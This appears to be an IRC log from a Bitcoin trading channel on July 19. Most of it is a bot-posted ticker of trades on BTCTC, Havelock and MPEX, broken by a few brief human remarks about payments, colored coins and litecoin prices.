[AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 07:38:28 [HAVELOCK] [HIM] 2 @ 0.26899999 = 0.538 BTC [-] Jul 19 07:38:51 [BTCTC] [BASIC-MINING] 2 @ 0.7374 = 1.4748 BTC [+] Jul 19 07:38:53 [HAVELOCK] [AM100] 7 @ 0.045499 = 0.3185 BTC [-] Jul 19 07:38:56 [HAVELOCK] [AM100] 13 @ 0.0454998 = 0.5915 BTC [+] Jul 19 07:38:59 [HAVELOCK] [KCIM] 1 @ 0.9999 BTC [+] Jul 19 07:39:34 [BTCTC] [AMC-PT] 19 @ 0.0025 = 0.0475 BTC [+] Jul 19 07:40:43 [HAVELOCK] [SMG] 5 @ 0.000425 = 0.0021 BTC [-] Jul 19 07:42:07 [HAVELOCK] [AM100] 1 @ 0.04500844 BTC [-] Jul 19 07:44:07 [HAVELOCK] [SMG] 10 @ 0.000425 = 0.0043 BTC [-] Jul 19 07:44:29 [HAVELOCK] [SMG] 183 @ 0.000424 = 0.0776 BTC [-] Jul 19 07:44:34 [BTCTC] [COGNITIVE] 6 @ 0.67 = 4.02 BTC [-] Jul 19 07:44:36 [BTCTC] [TAT.ASICMINER] 13 @ 0.045899 = 0.5967 BTC [+] Jul 19 07:44:37 [BTCTC] [COGNITIVE] 1 @ 0.662 BTC [-] Jul 19 07:44:39 [BTCTC] [COGNITIVE] 1 @ 0.661 BTC [-] Jul 19 07:44:41 [BTCTC] [COGNITIVE] 2 @ 0.660051 = 1.3201 BTC [-] Jul 19 07:44:42 [BTCTC] [COGNITIVE] 1 @ 0.660051 BTC [-] Jul 19 07:44:44 [BTCTC] [COGNITIVE] 10 @ 0.66005 = 6.6005 BTC [-] Jul 19 07:44:53 [BTCTC] [ASICMINER-PT] 5 @ 4.679899 = 23.3995 BTC [+] Jul 19 07:45:25 [BTCTC] [BASIC-MINING] 19 @ 0.7374 = 14.0106 BTC [+] Jul 19 07:45:42 [HAVELOCK] [SMG] 95 @ 0.000425 = 0.0404 BTC [+] Jul 19 07:46:05 [HAVELOCK] [SMG] 1 @ 0.000425 BTC [+] Jul 19 07:46:22 [BTCTC] [BASIC-MINING] 30 @ 0.7374 = 22.122 BTC [+] Jul 19 07:48:37 [HAVELOCK] [SDSTM] 63 @ 0.0105 = 0.6615 BTC [+] Jul 19 07:50:26 [HAVELOCK] [SDSTM] 99 @ 0.0105 = 1.0395 BTC [+] Jul 19 07:51:37 [HAVELOCK] [SDSTM] 1 @ 0.0105 BTC [+] Jul 19 07:52:38 [HAVELOCK] [SMG] 20 @ 0.000425 = 0.0085 BTC [+] Jul 19 07:53:43 [HAVELOCK] [SMG] 4 @ 0.0004249 = 0.0017 BTC [-] Jul 19 07:55:20 [BTCTC] [RSM] 6 @ 0.02 = 0.12 BTC [-] Jul 19 07:55:43 [BTCTC] [BASIC-MINING] 2 @ 0.736999 = 1.474 BTC [-] Jul 19 07:57:08 [BTCTC] [AMC-PT] 297 @ 0.0025 = 0.7425 BTC [+] Jul 19 07:58:02 [HAVELOCK] [SMG] 100 @ 0.0004 = 0.04 BTC [-] Jul 19 07:58:22 [BTCTC] [BASIC-MINING] 3 @ 0.737399 = 2.2122 BTC [+] Jul 19 07:58:23 [BTCTC] [BASIC-MINING] 7 @ 0.7374 = 5.1618 BTC [+] Jul 19 07:58:24 [BTCTC] [BASIC-MINING] 17 @ 0.737496 = 12.5374 BTC [+] Jul 19 07:59:30 [BTCTC] [ASICMINER-PT] 1 @ 4.5501 BTC [-] Jul 19 07:59:32 [BTCTC] [ASICMINER-PT] 2 @ 4.520101 = 9.0402 BTC [-] Jul 19 07:59:35 [BTCTC] [ASICMINER-PT] 1 @ 4.5201 BTC [-] Jul 19 07:59:38 [BTCTC] [ASICMINER-PT] 2 @ 4.52 = 9.04 BTC [-] Jul 19 07:59:40 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jul 19 07:59:42 [BTCTC] [ASICMINER-PT] 2 @ 4.52 = 9.04 BTC [-] Jul 19 07:59:45 [BTCTC] [AMC-PT] 55 @ 0.0025 = 0.1375 BTC [+] Jul 19 07:59:46 [BTCTC] [ASICMINER-PT] 2 @ 4.512101 = 9.0242 BTC [-] Jul 19 08:00:35 [HAVELOCK] [SMG] 100 @ 0.000399 = 0.0399 BTC [-] Jul 19 08:00:36 [HAVELOCK] [SMG] 100 @ 0.0004 = 0.04 BTC [+] Jul 19 08:01:17 [HAVELOCK] [SMG] 10 @ 0.000399 = 0.004 BTC [-] Jul 19 08:01:31 [BTCTC] [AMC-PT] 18000 @ 0.0025 = 45 BTC [+] Jul 19 08:02:46 [BTCTC] [BASIC-MINING] 1 @ 0.737496 BTC [+] Jul 19 08:03:10 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 08:05:32 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 19 08:06:34 [HAVELOCK] [AM1] 1 @ 4.527 BTC [-] Jul 19 08:06:37 [HAVELOCK] [AM1] 5 @ 4.5 = 22.5 BTC [-] Jul 19 08:07:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.0449 = 0.2694 BTC [-] Jul 19 08:07:20 [HAVELOCK] [HIM] 1 @ 0.26899999 BTC [-] Jul 19 08:07:40 [BTCTC] [AMC-PT] 511 @ 0.0025 = 1.2775 BTC [+] Jul 19 08:07:54 [BTCTC] [BASIC-MINING] 3 @ 0.737495 = 2.2125 BTC [-] Jul 19 08:07:57 [BTCTC] [AMC-PT] 1008 @ 0.0025 = 2.52 BTC [+] Jul 19 08:08:23 [HAVELOCK] [SDSTM] 7 @ 0.010999 = 0.077 BTC [+] Jul 19 08:08:28 [BTCTC] [ASICMINER-PT] 4 @ 4.512102 = 18.0484 BTC [+] Jul 19 08:08:30 [BTCTC] [ASICMINER-PT] 1 @ 4.512101 BTC [-] Jul 19 08:08:32 [BTCTC] [ASICMINER-PT] 4 @ 4.5121 = 18.0484 BTC [-] Jul 19 08:08:34 [BTCTC] [ASICMINER-PT] 1 @ 4.51205 BTC [-] Jul 19 08:08:49 [HAVELOCK] [AM100] 43 @ 0.04500844 = 1.9354 BTC [-] Jul 19 08:09:05 [HAVELOCK] [AM100] 28 @ 0.04500844 = 1.2602 BTC [-] Jul 19 08:09:39 [BTCTC] [BASIC-MINING] 1 @ 0.737496 BTC [+] Jul 19 08:11:04 [BTCTC] [AMC-PT] 17950 @ 0.0025 = 44.875 BTC [+] Jul 19 08:11:19 [BTCTC] [AMC-PT] 190 @ 0.0025 = 0.475 BTC [+] Jul 19 08:11:45 [HAVELOCK] [AM100] 5 @ 0.045499 = 0.2275 BTC [+] Jul 19 08:11:48 [HAVELOCK] [AM100] 3 @ 0.045499 = 0.1365 BTC [+] Jul 19 08:12:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.043511 = 0.087 BTC [-] Jul 19 08:12:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.04351 = 0.1305 BTC [-] Jul 19 08:12:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.043507 = 0.087 BTC [-] Jul 19 08:12:27 [HAVELOCK] [AM100] 3 @ 0.0447 = 0.1341 BTC [-] Jul 19 08:12:30 [BTCTC] [AMC-PT] 2610 @ 0.0025 = 6.525 BTC [+] Jul 19 08:12:54 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jul 19 08:13:36 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 08:14:41 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 08:15:12 [BTCTC] [GSDPT] 155 @ 0.003331 = 0.5163 BTC [+] Jul 19 08:15:14 [BTCTC] [GSDPT] 229 @ 0.00333 = 0.7626 BTC [-] Jul 19 08:17:35 [BTCTC] [ASICMINER-PT] 2 @ 4.64 = 9.28 BTC [+] Jul 19 08:20:21 [BTCTC] [BASIC-MINING] 2 @ 0.737494 = 1.475 BTC [-] Jul 19 08:20:23 [BTCTC] [BASIC-MINING] 4 @ 0.737494 = 2.95 BTC [-] Jul 19 08:20:24 [BTCTC] [BASIC-MINING] 9 @ 0.737495 = 6.6375 BTC [+] Jul 19 08:20:26 [BTCTC] [BASIC-MINING] 5 @ 0.737497 = 3.6875 BTC [+] Jul 19 08:20:47 [BTCTC] [AMC-PT] 17 @ 0.0025 = 0.0425 BTC [+] Jul 19 08:21:27 [HAVELOCK] [HIM] 2 @ 0.269 = 0.538 BTC [+] Jul 19 08:22:49 [HAVELOCK] [AM100] 2 @ 0.045449 = 0.0909 BTC [+] Jul 19 08:22:57 [HAVELOCK] [AM100] 9 @ 0.04545 = 0.4091 BTC [+] Jul 19 08:24:54 [BTCTC] [AMC-PT] 51 @ 0.0025 = 0.1275 BTC [+] Jul 19 08:24:56 [BTCTC] [S.DICE-PT] 1 @ 0.00336 BTC [+] Jul 19 08:24:59 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 19 08:25:35 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 19 08:25:51 [BTCTC] [AMC-PT] 28049 @ 0.0025 = 70.1225 BTC [+] Jul 19 08:26:23 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 08:26:31 [HAVELOCK] [SMG] 40 @ 0.00026 = 0.0104 BTC [-] Jul 19 08:29:19 [BTCTC] [GSDPT] 4 @ 0.003419 = 0.0137 BTC [+] Jul 19 08:31:39 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 19 08:32:18 [BTCTC] [AMC-PT] 450 @ 0.0025 = 1.125 BTC [+] Jul 19 08:33:40 [BTCTC] [BASIC-MINING] 1 @ 0.737497 BTC [+] Jul 19 08:34:28 [BTCTC] [AMC-PT] 45 @ 0.0025 = 0.1125 BTC [+] Jul 19 08:35:29 [BTCTC] [ASICMINER-PT] 2 @ 4.520205 = 9.0404 BTC [-] Jul 19 08:35:51 [BTCTC] [LTC-ATF.B2] 10 @ 0.01039 = 0.1039 BTC [-] Jul 19 08:35:53 [BTCTC] [COG.F] 1 @ 7 BTC [-] Jul 19 08:36:05 [BTCTC] [BASIC-MINING] 1 @ 0.737497 BTC [+] Jul 19 08:36:13 [BTCTC] [ASICMINER-PT] 1 @ 4.5202 BTC [-] Jul 19 08:37:01 [BTCTC] [AMC-PT] 300 @ 0.002499 = 0.7497 BTC [-] Jul 19 08:37:08 [BTCTC] [LTC-ATF.B2] 18 @ 0.010391 = 0.187 BTC [+] Jul 19 08:37:10 [BTCTC] [LTC-ATF.B2] 3 @ 0.010392 = 0.0312 BTC [+] Jul 19 08:37:35 [BTCTC] [AMC-PT] 529 @ 0.002499 = 1.322 BTC [-] Jul 19 08:39:42 [BTCTC] [AMC-PT] 4874 @ 0.0025 = 12.185 BTC [+] Jul 19 08:40:29 [HAVELOCK] [AM100] 3 @ 0.045449 = 0.1363 BTC [-] Jul 19 08:40:31 [HAVELOCK] [AM100] 2 @ 0.045449 = 0.0909 BTC [-] Jul 19 08:41:06 [HAVELOCK] [SMG] 2000 @ 0.000333 = 0.666 BTC [+] Jul 19 08:41:55 [HAVELOCK] [AM100] 34 @ 0.045449 = 1.5453 BTC [-] Jul 19 08:49:21 [BTCTC] [DMS.PURCHASE] 3 @ 0.039505 = 0.1185 BTC [-] Jul 19 08:49:33 [HAVELOCK] [AM100] 1 @ 0.045449 BTC [-] Jul 19 08:50:18 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jul 19 08:50:29 [BTCTC] [BMF] 13 @ 0.034 = 0.442 BTC [-] Jul 19 08:50:30 [BTCTC] [BMF] 15 @ 0.0333 = 0.4995 BTC [-] Jul 19 08:50:31 [BTCTC] [BMF] 11 @ 0.033 = 0.363 BTC [-] Jul 19 08:50:33 [BTCTC] [BMF] 25 @ 0.03201 = 0.8003 BTC [-] Jul 19 08:50:57 [HAVELOCK] [AM100] 1 @ 0.045449 BTC [-] Jul 19 08:50:59 [HAVELOCK] [AM100] 6 @ 0.04545 = 0.2727 BTC [+] Jul 19 08:51:10 [BTCTC] [AMC-PT] 997 @ 0.0025 = 2.4925 BTC [+] Jul 19 08:51:42 [BTCTC] [DMS.PURCHASE] 10 @ 0.039505 = 0.3951 BTC [-] Jul 19 08:52:18 [BTCTC] [BASIC-MINING] 2 @ 0.737497 = 1.475 BTC [+] Jul 19 08:53:40 [BTCTC] [COGNITIVE] 2 @ 0.66005 = 1.3201 BTC [-] Jul 19 08:54:21 [BTCTC] [BASIC-MINING] 2 @ 0.695101 = 1.3902 BTC [-] Jul 19 08:54:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0039 = 0.039 BTC [+] Jul 19 08:54:41 [BTCTC] [COGNITIVE] 2 @ 0.77 = 1.54 BTC [+] Jul 19 08:55:17 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003902 = 0.039 BTC [+] Jul 19 08:55:19 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003901 = 0.3901 BTC [-] Jul 19 08:56:25 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0039 = 0.039 BTC [-] Jul 19 08:56:41 [HAVELOCK] [AM100] 15 @ 0.04545 = 0.6818 BTC [+] Jul 19 08:57:47 [BTCTC] [BTC-BOND] 8 @ 0.009996 = 0.08 BTC [+] Jul 19 08:59:02 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [+] Jul 19 08:59:48 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [+] Jul 19 09:00:01 [BTCTC] [S.DICE-PT] 530 @ 0.003351 = 1.776 BTC [-] Jul 19 09:00:27 [BTCTC] [AMC-PT] 5988 @ 0.0025 = 14.97 BTC [+] Jul 19 09:00:40 [BTCTC] [S.DICE-PT] 2378 @ 0.00335 = 7.9663 BTC [-] Jul 19 09:00:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [+] Jul 19 09:00:59 [BTCTC] [BASIC-MINING] 3 @ 0.737497 = 2.2125 BTC [+] Jul 19 09:01:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [+] Jul 19 09:02:18 [BTCTC] [S.DICE-PT] 1436 @ 0.00335 = 4.8106 BTC [-] Jul 19 09:02:20 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [+] Jul 19 09:02:22 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [+] Jul 19 09:02:24 [BTCTC] [ASICMINER-PT] 1 @ 4.633 BTC [+] Jul 19 09:02:26 [BTCTC] [ASICMINER-PT] 1 @ 4.635 BTC [+] Jul 19 09:02:34 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [+] Jul 19 09:02:49 [BTCTC] [S.DICE-PT] 1 @ 0.00335 BTC [-] Jul 19 09:03:09 [HAVELOCK] [SMG] 85 @ 0.000333 = 0.0283 BTC [+] Jul 19 09:03:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [+] Jul 19 09:04:55 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003953 = 0.0395 BTC [+] Jul 19 09:06:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003953 = 0.0395 BTC [+] Jul 19 09:06:07 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.003952 = 0.0435 BTC [-] Jul 19 09:06:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:07:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:08:44 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:09:19 [HAVELOCK] [AM100] 1 @ 0.04545 BTC [+] Jul 19 09:09:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.044001 = 2.2001 BTC [+] Jul 19 09:09:32 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:10:27 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:10:35 [BTCTC] [BASIC-MINING] 2 @ 0.737496 = 1.475 BTC [-] Jul 19 09:10:36 [BTCTC] [BASIC-MINING] 3 @ 0.737497 = 2.2125 BTC [+] Jul 19 09:11:11 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:12:38 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:13:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003951 = 0.0395 BTC [-] Jul 19 09:13:48 [BTCTC] [S.DICE-PT] 1200 @ 0.00335 = 4.02 BTC [-] Jul 19 09:14:08 [HAVELOCK] [SMG] 400 @ 0.000333 = 0.1332 BTC [+] Jul 19 09:14:25 [BTCTC] [AMC-PT] 220 @ 0.0025 = 0.55 BTC [+] Jul 19 09:15:24 [BTCTC] [DMS.PURCHASE] 102 @ 0.039505 = 4.0295 BTC [-] Jul 19 09:15:37 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003953 = 0.0395 BTC [+] Jul 19 09:15:39 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.003952 = 0.0869 BTC [-] Jul 19 09:19:48 [BTCTC] [AMC-PT] 4839 @ 0.0025 = 12.0975 BTC [+] Jul 19 09:23:03 [HAVELOCK] [SMG] 15 @ 0.000333 = 0.005 BTC [+] Jul 19 09:23:17 [HAVELOCK] [SMG] 1 @ 0.000344 BTC [+] Jul 19 09:25:54 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.003951 = 0.1738 BTC [-] Jul 19 09:26:53 [BTCTC] [AMC-PT] 1300 @ 0.0025 = 3.25 BTC [+] Jul 19 09:27:08 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 19 09:28:05 [MPEX] [S.BBET] 289 @ 0.00102899 = 0.2974 BTC [+] Jul 19 09:29:17 [BTCTC] [ASICMINER-PT] 2 @ 4.649 = 9.298 BTC [+] Jul 19 09:29:33 [BTCTC] [ASICMINER-PT] 5 @ 4.550001 = 22.75 BTC [-] Jul 19 09:32:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.044301 = 0.443 BTC [+] Jul 19 09:32:21 [BTCTC] [BITVPS] 1 @ 0.001801 BTC [-] Jul 19 09:32:32 [BTCTC] [AMC-PT] 750 @ 0.0025 = 1.875 BTC [+] Jul 19 09:32:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003814 = 0.0076 BTC [-] Jul 19 09:32:45 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003813 = 0.0076 BTC [-] Jul 19 09:32:45 [BTCTC] [TAT.VIRTUALMINE] 189 @ 0.003812 = 0.7205 BTC [-] Jul 19 09:32:47 [BTCTC] [TAT.VIRTUALMINE] 57 @ 0.00381 = 0.2172 BTC [-] Jul 19 09:32:57 [HAVELOCK] [AM1] 5 @ 4.55 = 22.75 BTC [+] Jul 19 09:33:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.04432 = 0.0886 BTC [+] Jul 19 09:33:18 [HAVELOCK] [AM100] 50 @ 0.04545 = 2.2725 BTC [+] Jul 19 09:34:27 [BTCTC] [AMC-PT] 9220 @ 0.0025 = 23.05 BTC [+] Jul 19 09:34:44 [BTCTC] [AMC-PT] 210 @ 0.0025 = 0.525 BTC [+] Jul 19 09:36:20 [BTCTC] [ASICMINER-PT] 2 @ 4.639996 = 9.28 BTC [+] Jul 19 09:36:22 [BTCTC] [ASICMINER-PT] 2 @ 4.639997 = 9.28 BTC [+] Jul 19 09:36:24 [BTCTC] [ASICMINER-PT] 3 @ 4.64 = 13.92 BTC [+] Jul 19 09:37:22 [BTCTC] [AMC-PT] 70 @ 0.0025 = 0.175 BTC [+] Jul 19 09:39:05 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 19 09:40:50 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 09:42:03 [BTCTC] [AMC-PT] 2950 @ 0.0025 = 7.375 BTC [+] Jul 19 09:42:18 [HAVELOCK] [AM100] 3 @ 0.04545 = 0.1364 BTC [+] Jul 19 09:43:46 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jul 19 09:48:48 [BTCTC] [BITVPS] 7 @ 0.001801 = 0.0126 BTC [-] Jul 19 09:49:57 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [-] Jul 19 09:51:04 [HAVELOCK] [HIM] 2 @ 0.269 = 0.538 BTC [+] Jul 19 09:51:30 [BTCTC] [TAT.VIRTUALMINE] 88 @ 0.003811 = 0.3354 BTC [+] Jul 19 09:51:42 [BTCTC] [ASICMINER-PT] 1 @ 4.56 BTC [-] Jul 19 09:52:20 [BTCTC] [AMC-PT] 101 @ 0.002496 = 0.2521 BTC [-] Jul 19 09:52:56 [BTCTC] [ASICMINER-PT] 5 @ 4.646934 = 23.2347 BTC [+] Jul 19 09:52:59 [BTCTC] [ASICMINER-PT] 2 @ 4.646935 = 9.2939 BTC [+] Jul 19 09:53:01 [BTCTC] [ASICMINER-PT] 8 @ 4.647 = 37.176 BTC [+] Jul 19 09:53:03 [BTCTC] [ASICMINER-PT] 8 @ 4.648 = 37.184 BTC [+] Jul 19 09:53:05 [BTCTC] [ASICMINER-PT] 1 @ 4.67987 BTC [+] Jul 19 09:53:06 [BTCTC] [ASICMINER-PT] 1 @ 4.679898 BTC [+] Jul 19 09:53:12 [BTCTC] [BTC-BOND] 2 @ 0.009956 = 0.0199 BTC [-] Jul 19 09:53:47 [BTCTC] [TAT.VIRTUALMINE] 800 @ 0.003811 = 3.0488 BTC [+] Jul 19 09:54:10 [BTCTC] [COGNITIVE] 7 @ 0.7 = 4.9 BTC [-] Jul 19 09:55:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.0444 = 0.0888 BTC [+] Jul 19 09:56:02 [BTCTC] [TAT.ASICMINER] 74 @ 0.0444 = 3.2856 BTC [+] Jul 19 09:56:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.045201 = 0.1808 BTC [+] Jul 19 09:57:05 [BTCTC] [TAT.ASICMINER] 21 @ 0.045202 = 0.9492 BTC [+] Jul 19 10:02:27 [MPEX] [S.MPOE] 9618 @ 0.00089243 = 8.5834 BTC [+] Jul 19 10:02:28 [BTCTC] [ASICMINER-PT] 1 @ 4.64 BTC [-] Jul 19 10:02:30 [BTCTC] [ASICMINER-PT] 1 @ 4.6799 BTC [+] Jul 19 10:02:43 [BTCTC] [ASICMINER-PT] 1 @ 4.68998 BTC [+] Jul 19 10:02:45 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [+] Jul 19 10:03:00 [HAVELOCK] [SDSTM] 10 @ 0.010999 = 0.11 BTC [+] Jul 19 10:07:48 [BTCTC] [BASIC-MINING] 2 @ 0.737497 = 1.475 BTC [+] Jul 19 10:08:47 [HAVELOCK] [AM100] 12 @ 0.045495 = 0.5459 BTC [+] Jul 19 10:08:53 [HAVELOCK] [AM100] 1 @ 0.045495 BTC [+] Jul 19 10:09:01 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 19 10:11:23 [HAVELOCK] [SDSTM] 20 @ 0.010999 = 0.22 BTC [+] Jul 19 10:12:57 [HAVELOCK] [SDSTM] 3 @ 0.010999 = 0.033 BTC [+] Jul 19 10:14:41 [HAVELOCK] [SDSTM] 3 @ 0.010999 = 0.033 BTC [+] Jul 19 10:15:06 [HAVELOCK] [SDSTM] 1 @ 0.010999 BTC [+] Jul 19 10:15:28 [HAVELOCK] [SDSTM] 1 @ 0.010999 BTC [+] Jul 19 10:16:41 [BTCTC] [AMC-PT] 7980 @ 0.0025 = 19.95 BTC [+] Jul 19 10:17:36 omg, 20 payments? Jul 19 10:18:06 mkay, let's do deposits first... Jul 19 10:25:36 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [+] Jul 19 10:25:45 [BTCTC] [AMC-PT] 271 @ 0.0025 = 0.6775 BTC [+] Jul 19 10:28:16 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 10:29:08 [HAVELOCK] [SMG] 999 @ 0.000344 = 0.3437 BTC [+] Jul 19 10:29:10 [HAVELOCK] [SMG] 1 @ 0.0003499 BTC [+] Jul 19 10:29:34 [HAVELOCK] [SMG] 889 @ 0.0003499 = 0.3111 BTC [+] Jul 19 10:29:37 [HAVELOCK] [SMG] 1000 @ 0.00035 = 0.35 BTC [+] Jul 19 10:29:39 [HAVELOCK] [SMG] 111 @ 0.000362 = 0.0402 BTC [+] Jul 19 10:31:38 [BTCTC] [AMC-PT] 7160 @ 0.0025 = 17.9 BTC [+] Jul 19 10:31:54 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jul 19 10:33:45 [BTCTC] [TAT.ASICMINER] 30 @ 0.045209 = 1.3563 BTC [+] Jul 19 10:34:40 [HAVELOCK] [AM1] 4 @ 4.55 = 18.2 BTC [+] Jul 19 10:34:58 [BTCTC] [BTC-BOND] 3 @ 0.009956 = 0.0299 BTC [-] Jul 19 10:35:00 [BTCTC] [BTC-BOND] 9 @ 0.009955 = 0.0896 BTC [-] Jul 19 10:35:01 [BTCTC] [BTC-BOND] 2 @ 0.009951 = 0.0199 BTC [-] Jul 19 10:35:03 [BTCTC] [BTC-BOND] 10 @ 0.00992 = 0.0992 BTC [-] Jul 19 10:35:03 [BTCTC] [BTC-BOND] 50 @ 0.00991 = 0.4955 BTC [-] Jul 19 10:35:04 [BTCTC] [BTC-BOND] 2387 @ 0.009905 = 23.6432 BTC [-] Jul 19 10:35:18 [HAVELOCK] [SMG] 14 @ 0.000362 = 0.0051 BTC [+] Jul 19 10:36:27 [BTCTC] [BTC-BOND] 468 @ 0.009905 = 4.6355 BTC [-] Jul 19 10:38:29 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jul 19 10:41:03 [HAVELOCK] [SDSTM] 9 @ 0.010999 = 0.099 BTC [+] Jul 19 10:41:33 [HAVELOCK] [SDSTM] 8 @ 0.010999 = 0.088 BTC [+] Jul 19 10:46:42 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0039 = 0.0195 BTC [+] Jul 19 10:46:53 [BTCTC] [AMC-PT] 1 @ 0.0023 BTC [-] Jul 19 10:47:29 [BTCTC] [AMC-PT] 720 @ 0.0025 = 1.8 BTC [+] Jul 19 10:50:40 [HAVELOCK] [HIM] 4 @ 0.269 = 1.076 BTC [+] Jul 19 10:50:44 [HAVELOCK] [AM1] 2 @ 4.6 = 9.2 BTC [+] Jul 19 10:50:46 [BTCTC] [AMC-PT] 9000 @ 0.0025 = 22.5 BTC [+] Jul 19 10:51:40 [BTCTC] [AMC-PT] 184 @ 0.0025 = 0.46 BTC [+] Jul 19 10:51:44 [HAVELOCK] [KCIM] 1 @ 0.9999 BTC [+] Jul 19 10:51:54 [BTCTC] [COGNITIVE] 14 @ 0.768988 = 10.7658 BTC [+] Jul 19 10:51:56 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jul 19 10:51:57 [HAVELOCK] [AM100] 25 @ 0.04549 = 1.1373 BTC [-] Jul 19 10:52:00 [BTCTC] [COGNITIVE] 1 @ 0.768989 BTC [+] Jul 19 10:52:01 [BTCTC] [COGNITIVE] 3 @ 0.769 = 2.307 BTC [+] Jul 19 10:53:27 [HAVELOCK] [SDSTM] 38 @ 0.010999 = 0.418 BTC [+] Jul 19 10:53:49 [BTCTC] [AMC-PT] 23 @ 0.0023 = 0.0529 BTC [-] Jul 19 10:54:55 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 19 10:55:18 [HAVELOCK] [SMG] 150 @ 0.000362 = 0.0543 BTC [+] Jul 19 10:56:06 [HAVELOCK] [VTX] 2 @ 0.70999999 = 1.42 BTC [+] Jul 19 10:56:47 [BTCTC] [AMC-PT] 20000 @ 0.0025 = 50 BTC [+] Jul 19 10:57:28 [HAVELOCK] [AM100] 3 @ 0.04460002 = 0.1338 BTC [-] Jul 19 10:57:30 [HAVELOCK] [AM100] 2 @ 0.04460001 = 0.0892 BTC [-] Jul 19 10:57:33 [HAVELOCK] [AM100] 70 @ 0.0446 = 3.122 BTC [-] Jul 19 10:57:35 [HAVELOCK] [AM100] 5 @ 0.04549 = 0.2275 BTC [+] Jul 19 10:58:11 [HAVELOCK] [AM1] 1 @ 4.6 BTC [+] Jul 19 10:59:55 [HAVELOCK] [HIM] 10 @ 0.27 = 2.7 BTC [+] Jul 19 11:01:49 [BTCTC] [AMC-PT] 1893 @ 0.0025 = 4.7325 BTC [+] Jul 19 11:01:51 [BTCTC] [AMC-PT] 3107 @ 0.0025 = 7.7675 BTC [+] Jul 19 11:02:27 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jul 19 11:03:44 Check this out, ya monkeys: https://github.com/bitcoinx/colored-coin-tools/wiki/The-next-gen-colored-coin-client Jul 19 11:04:39 I thought the term 'colored' went out with the 1960's 'negro' term. Jul 19 11:05:24 [BTCTC] [AMC-PT] 1830 @ 0.0025 = 4.575 BTC [+] Jul 19 11:06:15 They're saying litecoins will jump to $10..what are they smoking. Jul 19 11:06:17 [BTCTC] [AMC-PT] 891 @ 0.0025 = 2.2275 BTC [+] Jul 19 11:06:43 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199998 = 1 BTC 